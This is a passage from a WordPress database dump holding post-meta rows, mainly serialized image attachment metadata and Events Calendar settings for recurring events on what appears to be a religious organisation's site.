8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29753,204616,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:520;s:6:\"height\";i:109;s:4:\"file\";s:43:\"2019/12/co-EK-BGrid-logo-title-image-lg.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:42:\"co-EK-BGrid-logo-title-image-lg-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-150x109.png\";s:5:\"width\";i:150;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-450x109.png\";s:5:\"width\";i:450;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:41:\"co-EK-BGrid-logo-title-image-lg-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-300x109.png\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:42:\"co-EK-BGrid-logo-title-image-lg-250x52.png\";s:5:\"width\";i:250;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-210x109.png\";s:5:\"width\";i:210;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:43:\"co-EK-BGrid-logo-title-image-lg-400x109.png\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29745,204591,'_wp_attached_file','2019/12/favicon2.png'),(29746,204591,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:20:\"2019/12/favicon2.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"favicon2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"favicon2-450x250.png\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:18:\"favicon2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:20:\"favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:20:\"favicon2-250x250.png\";s:5:\"width\";i:250;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:20:\"favicon2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:20:\"favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:20:\"favicon2-500x500.png\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:20:\"favicon2-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:20:\"favicon2-400x285.png\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:20:\"favicon2-512x500.png\";s:5:\"width\";i:512;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29747,204592,'_wp_attached_file','2019/12/cropped-favicon2.png'),(29748,204592,'_wp_attachment_context','site-icon'),(29749,204592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:28:\"2019/12/cropped-favicon2.png\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-450x250.png\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"cropped-favicon2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-250x250.png\";s:5:\"width\";i:250;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-500x500.png\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-400x285.png\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-512x500.png\";s:5:\"width\";i:512;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:28:\"cropped-favicon2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:26:\"cropped-favicon2-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(74009,254946,'protect_children',''),(74010,254946,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1579511511;s:12:\"_EventOrigin\";i:1579511511;s:24:\"boldgrid_hide_page_title\";i:1579511511;s:16:\"_EventRecurrence\";i:1606926348;s:17:\"_EventShowMapLink\";i:1579511511;s:13:\"_EventShowMap\";i:1579511511;s:13:\"_EventVenueID\";i:1579511511;s:15:\"_EventStartDate\";i:1579512208;s:13:\"_EventEndDate\";i:1579512208;s:18:\"_EventStartDateUTC\";i:1579512208;s:16:\"_EventEndDateUTC\";i:1579512208;s:14:\"_EventDuration\";i:1579512208;s:20:\"_EventCurrencySymbol\";i:1579511511;s:22:\"_EventCurrencyPosition\";i:1579511511;s:10:\"_EventCost\";i:1579511511;s:9:\"_EventURL\";i:1579511511;s:14:\"_EventTimezone\";i:1579511511;s:18:\"_EventTimezoneAbbr\";i:1579512208;s:13:\"_thumbnail_id\";i:1579511511;s:12:\"_dp_original\";i:1579511511;s:27:\"_EventNextPendingRecurrence\";i:1579511511;s:16:\"tribe_events_cat\";i:1606951548;s:10:\"_edit_last\";i:1579511601;s:10:\"post_title\";i:1579516534;s:12:\"post_content\";i:1579512747;s:11:\"post_status\";i:1579512208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606926349;s:26:\"_RTECregistrationsDisabled\";i:1606926348;s:17:\"_RTECdeadlineType\";i:1606926348;s:19:\"_RTECwhoCanRegister\";i:1606926348;s:23:\"_RTEClimitRegistrations\";i:1606926348;s:21:\"_RTECmaxRegistrations\";i:1606926348;s:22:\"_EventHideFromUpcoming\";i:1606926348;}'),(74011,254946,'_EventOrigin','events-calendar'),(74012,254946,'_EventOrigin','events-calendar'),(74013,254946,'_EventOrigin','events-calendar'),(74014,254946,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1579511511;s:12:\"_EventOrigin\";i:1579511511;s:24:\"boldgrid_hide_page_title\";i:1579511511;s:16:\"_EventRecurrence\";i:1606926348;s:17:\"_EventShowMapLink\";i:1579511511;s:13:\"_EventShowMap\";i:1579511511;s:13:\"_EventVenueID\";i:1579511511;s:15:\"_EventStartDate\";i:1579512208;s:13:\"_EventEndDate\";i:1579512208;s:18:\"_EventStartDateUTC\";i:1579512208;s:16:\"_EventEndDateUTC\";i:1579512208;s:14:\"_EventDuration\";i:1579512208;s:20:\"_EventCurrencySymbol\";i:1579511511;s:22:\"_EventCurrencyPosition\";i:1579511511;s:10:\"_EventCost\";i:1579511511;s:9:\"_EventURL\";i:1579511511;s:14:\"_EventTimezone\";i:1579511511;s:18:\"_EventTimezoneAbbr\";i:1579512208;s:13:\"_thumbnail_id\";i:1579511511;s:12:\"_dp_original\";i:1579511511;s:27:\"_EventNextPendingRecurrence\";i:1579511511;s:16:\"tribe_events_cat\";i:1606951548;s:10:\"_edit_last\";i:1579511601;s:10:\"post_title\";i:1579516534;s:12:\"post_content\";i:1579512747;s:11:\"post_status\";i:1579512208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606926349;s:26:\"_RTECregistrationsDisabled\";i:1606926348;s:17:\"_RTECdeadlineType\";i:1606926348;s:19:\"_RTECwhoCanRegister\";i:1606926348;s:23:\"_RTEClimitRegistrations\";i:1606926348;s:21:\"_RTECmaxRegistrations\";i:1606926348;s:22:\"_EventHideFromUpcoming\";i:1606926348;}'),(74018,254946,'_EventShowMapLink','1'),(74015,254946,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1579511511;s:12:\"_EventOrigin\";i:1579511511;s:24:\"boldgrid_hide_page_title\";i:1579511511;s:16:\"_EventRecurrence\";i:1606926348;s:17:\"_EventShowMapLink\";i:1579511511;s:13:\"_EventShowMap\";i:1579511511;s:13:\"_EventVenueID\";i:1579511511;s:15:\"_EventStartDate\";i:1579512208;s:13:\"_EventEndDate\";i:1579512208;s:18:\"_EventStartDateUTC\";i:1579512208;s:16:\"_EventEndDateUTC\";i:1579512208;s:14:\"_EventDuration\";i:1579512208;s:20:\"_EventCurrencySymbol\";i:1579511511;s:22:\"_EventCurrencyPosition\";i:1579511511;s:10:\"_EventCost\";i:1579511511;s:9:\"_EventURL\";i:1579511511;s:14:\"_EventTimezone\";i:1579511511;s:18:\"_EventTimezoneAbbr\";i:1579512208;s:13:\"_thumbnail_id\";i:1579511511;s:12:\"_dp_original\";i:1579511511;s:27:\"_EventNextPendingRecurrence\";i:1579511511;s:16:\"tribe_events_cat\";i:1606951548;s:10:\"_edit_last\";i:1579511601;s:10:\"post_title\";i:1579516534;s:12:\"post_content\";i:1579512747;s:11:\"post_status\";i:1579512208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606926349;s:26:\"_RTECregistrationsDisabled\";i:1606926348;s:17:\"_RTECdeadlineType\";i:1606926348;s:19:\"_RTECwhoCanRegister\";i:1606926348;s:23:\"_RTEClimitRegistrations\";i:1606926348;s:21:\"_RTECmaxRegistrations\";i:1606926348;s:22:\"_EventHideFromUpcoming\";i:1606926348;}'),(74017,254946,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103783,254946,'_EventHideFromUpcoming','yes'),(74016,254946,'boldgrid_hide_page_title','0'),(74019,254946,'_EventShowMap','1'),(74020,254946,'_EventVenueID','51883'),(74021,254946,'_EventStartDate','2020-02-09 10:30:00'),(74022,254946,'_EventEndDate','2020-02-09 11:30:00'),(74023,254946,'_EventStartDateUTC','2020-02-09 17:30:00'),(74024,254946,'_EventEndDateUTC','2020-02-09 18:30:00'),(74025,254946,'_EventDuration','3600'),(74026,254946,'_EventCurrencySymbol',''),(74027,254946,'_EventCurrencyPosition','prefix'),(74028,254946,'_EventCost',''),(74029,254946,'_EventURL',''),(74030,254946,'_EventTimezone','America/Denver'),(74031,254946,'_EventTimezoneAbbr','MST'),(74035,254946,'_dp_original','130320'),(74034,254946,'_EventNextPendingRecurrence','2022-01-23 10:30:00'),(74036,254946,'_edit_lock','1606952804:2'),(74045,254946,'_edit_last','2'),(131870,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131895,263791,'_EventStartDate','2021-02-26 19:00:00'),(131857,263791,'protect_children',''),(131858,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131859,263791,'_EventOrigin','events-calendar'),(131860,263791,'protect_children',''),(131861,263791,'protect_children',''),(131862,263791,'protect_children',''),(131863,263791,'protect_children',''),(131864,263791,'protect_children',''),(131865,263791,'protect_children',''),(131866,263791,'protect_children',''),(131867,263791,'protect_children',''),(131868,263791,'protect_children',''),(131869,263791,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1613553800;s:12:\"_EventOrigin\";i:1613553800;s:13:\"_thumbnail_id\";i:1613554584;s:24:\"boldgrid_hide_page_title\";i:1613553800;s:17:\"_EventShowMapLink\";i:1613553800;s:13:\"_EventShowMap\";i:1613553800;s:15:\"_EventStartDate\";i:1613554584;s:13:\"_EventEndDate\";i:1613554584;s:18:\"_EventStartDateUTC\";i:1613554584;s:16:\"_EventEndDateUTC\";i:1613554584;s:14:\"_EventDuration\";i:1613554584;s:20:\"_EventCurrencySymbol\";i:1613553800;s:22:\"_EventCurrencyPosition\";i:1613553800;s:10:\"_EventCost\";i:1613553800;s:9:\"_EventURL\";i:1613553800;s:14:\"_EventTimezone\";i:1613553800;s:18:\"_EventTimezoneAbbr\";i:1613553800;s:27:\"_EventNextPendingRecurrence\";i:1613553800;s:26:\"_RTECregistrationsDisabled\";i:1613553800;s:17:\"_RTECdeadlineType\";i:1613553800;s:19:\"_RTECwhoCanRegister\";i:1613553800;s:23:\"_RTEClimitRegistrations\";i:1613553800;s:21:\"_RTECmaxRegistrations\";i:1613553800;s:16:\"_EventRecurrence\";i:1613553800;s:18:\"_RTECnumRegistered\";i:1613553800;s:13:\"_EventVenueID\";i:1613553800;s:12:\"_dp_original\";i:1613553800;s:10:\"_edit_last\";i:1613553876;s:10:\"post_title\";i:1613556912;s:12:\"post_content\";i:1613555770;s:16:\"tribe_events_cat\";i:1613582112;s:11:\"post_status\";i:1613554584;}'),(131894,263791,'_EventShowMap',''),(122457,263254,'_wp_old_slug','the-easy-way'),(122400,263253,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122379,263252,'_RTECwhoCanRegister','any'),(122380,263252,'_RTEClimitRegistrations','0'),(122367,263252,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122375,263252,'_dp_original','201534'),(122376,263252,'protect_children',''),(122364,263252,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122369,263252,'_EventShowMap','1'),(29809,205232,'_wp_attached_file','2019/12/eck-temple-member-cal-promo.jpg'),(29810,205232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:231;s:4:\"file\";s:39:\"2019/12/eck-temple-member-cal-promo.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:37:\"eck-temple-member-cal-promo-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:39:\"eck-temple-member-cal-promo-400x231.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94481,261784,'_seq_num','104'),(73459,254444,'_wp_attached_file','2020/01/hu-sos-bgrid-sized.png'),(73461,254444,'_edit_lock','1579384709:2'),(73460,254444,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:240;s:6:\"height\";i:147;s:4:\"file\";s:30:\"2020/01/hu-sos-bgrid-sized.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"hu-sos-bgrid-sized-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"hu-sos-bgrid-sized-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"hu-sos-bgrid-sized-210x147.png\";s:5:\"width\";i:210;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(85359,258076,'original-file','2020/02/eck-on-youtube-sized-f-updraft-pre-smush-original.png'),(129865,263590,'_RTECwhoCanRegister','any'),(129866,263590,'_RTEClimitRegistrations','0'),(129788,263610,'_EventOrigin','events-calendar'),(129860,263590,'_EventOrigin','events-calendar'),(129863,263590,'_RTECregistrationsDisabled','1'),(129864,263590,'_RTECdeadlineType','start'),(29947,210314,'_wp_attached_file','2019/12/members-newsletter-bgrid-2.png'),(29948,210314,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:116;s:4:\"file\";s:38:\"2019/12/members-newsletter-bgrid-2.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"members-newsletter-bgrid-2-300x70.png\";s:5:\"width\";i:300;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-2-150x116.png\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"members-newsletter-bgrid-2-450x116.png\";s:5:\"width\";i:450;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"members-newsletter-bgrid-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"